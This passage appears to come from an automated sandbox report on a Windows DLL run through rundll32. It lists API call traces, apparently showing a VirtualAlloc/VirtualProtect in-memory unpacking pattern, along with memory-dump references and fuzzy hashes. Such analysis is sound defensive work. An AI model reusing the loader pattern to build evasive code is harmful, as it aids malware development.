                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001,?,6DE43E74,6DE3F5F6), ref: 6DE47C0F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47BD5: CloseHandle.KERNEL32(6DE70910,6DE47C1F,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001), ref: 6DE47BE5
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6DE47C1F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47B97: CreateFileW.KERNEL32(6DE6DD58,40000000,00000003,00000000,00000003,00000000,00000000,6DE47BC6,6DE46B6D,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47BAA
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47C34
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction ID: 857b38e379a6607ce46a2f58ef36bf43df82ef0b2be58f83381681d805834032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01C36501129BBDF626FD1DD08A9A3FB6EB4A3A4F118014FE18A5260CB328960DBD0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-2837366778
                                                                                                                                                                                                                                                          • Opcode ID: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction ID: 1177f8be6ac38978d84a475a5888ab8d44364a7ff606dbb0b8f5564a53dbfe10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414771B44235ABDB12DF999C809BEBBF8EF86314F32405AE514A7340DB71DA41C754
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6DE71E18), ref: 6DE72480
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6DE71E7C), ref: 6DE724B7
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6DE72517
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE7254D
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00000000,00000004,6DE723A2), ref: 6DE72652
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00001000,00000004,6DE723A2), ref: 6DE72679
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2), ref: 6DE72746
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2,?), ref: 6DE7279C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE727B8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481906347.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2574235972-0
                                                                                                                                                                                                                                                          • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction ID: 0efb1801fed34ec62a7a663e9c3cf7a36147c5d7f49471c05b40fc200e059d46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D17E362002819FDF61CF54C880F5177A6FF58714B1A45A4EE0AAF75BEB31B850DB62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                          • Opcode ID: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction ID: 2b87e4c9354f9012ce1a144f5639eeef7f517a0465a234262c58401ed5d7a458
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0219471D04739FBDB266E54CC40ABF3A79EB85698F234119F81467610CB308E03CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6DE37387
                                                                                                                                                                                                                                                            • Part of subcall function 6DE37BA4: RtlInitializeSListHead.NTDLL(6DE7C780), ref: 6DE37BA9
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DE373F1
                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 6DE3743B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 2097537958-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction ID: af419aaefb9eeaa3da4893b8e8e0b2197aa4f62a32966191de4adaa6bca7c65f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218E32A4C232DADB05BBB4A9047BC7BB19F0632DF33845DDA807B2C1DF615545C665
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6DE41D07
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DE41D75
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D6C4: RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE41D66
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2560199156-0
                                                                                                                                                                                                                                                          • Opcode ID: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction ID: 5ba21e5573019dbdedcb8a1564be68c68804b1a21aee047c8901b2fafa0fa3d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4101ACE2E056557BAF2555F62E88D7F296DDEC3DD9326412CFA18E2240EF50CC1281B0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6DE335B3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction ID: 1115afd1a7ed923e406f6e647771b745372071fa741e67ba74b00846fb492e03
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F7122719002748FCB54CF2EC490BB97BF6FB47220F25866AE494D7381D7399609DB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6DE409B9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction ID: 8f3cdb6fc238f1dcb111a644db3b11c1714873b558ea6b24662a11a3468a7414
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0B43164963567FB529A27AC04B6A3768AFE6774B32C035AB2CF6280CF20D44182A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction ID: 9b203a202315def1d33e9704a9455b78d199e4f037fb1c0bb62c660e1ccade68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E0E52A24423A67EB1116668D01B7B769CEFC27A8F734150DD39B22C0CF20C843C6B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6DE4297E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456CE
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456E0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456F2
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45704
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45716
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45728
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4573A
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4574C
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4575E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45770
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45782
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45794
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE457A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42973
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42995
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429AA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429B5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429EA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429F8
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A03
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A3B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A42
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A5F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A77
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction ID: 62937f88dd65bbaf75270fac1dbc8802996cfce4dc97a32381c655e6db36b1e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D315B31608602AEEB308A35E844B7A77E8BF50358F72852DE96DE6250DF31E860DB14
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE395CB
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6DE395F2
                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6DE396FE
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39753
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE397D9
                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6DE39860
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6DE3987B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction ID: e1c052020db4e65fc723426a1066abd43358c49f38e40b9b481dbb45479a0978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C14971C0822AABCF15CFA4CC809BEBBB5AF48318F224159E9157B241DF35D651CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D27E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D28A
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D295
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2B6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2C1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction ID: a0d095d940df9d4e950a5f75349bee08d61d88b10ae0e5b0bcd087542ff4b4a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A97A904118AFCF41DFA4C850DED7BB9FF48244B538169EA199B120DB31DA65CF80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction ID: ae685c0174bfd2950cdb2dc524a756d7f9a646737ffe83045cf254a01b6ea53b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C109B4E082159FDF11CF9AD880BBDBBB0BF9A318F61816DE515A7381CB349941CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE45818: _free.LIBCMT ref: 6DE4583D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4589E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458A9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458B4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45908
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45913
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4591E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45929
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction ID: baf96037eac13d19cd2360a1db81b5c30eff35fee0657e86b3a6d5557acc8f2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111A271548B48A6D660A770DC06FEB779CAF48704F938C2CE7AE66050CF65B4208F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6DE43593
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE43772
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE4378F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,6DE3F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE437D7
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DE43817
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE438C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4031098158-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction ID: 0c2daef5d81effb8130cf842e636622c31e7ec39b1acfa1e498102d46019e25c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1A9B5D002599FCB15CFE8D880AEDFBB5BF49314F24806AE855BB381DB31A946CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE391A7
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DE391B5
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DE391CE
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE39220
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction ID: beeee3ca464836ae6f426a96a93b45ba3c6297a59bd4f9d58c41d3c3ec9754b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D47224D6369EEB1955B56C88B7A36F4EB0377C733062DE620A61D0EF528851D140
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 1740715915-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction ID: b96f7f787ae87b698e0b9b9e3e9bedae5aff02ac2117288a903840a2bb2cd1a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
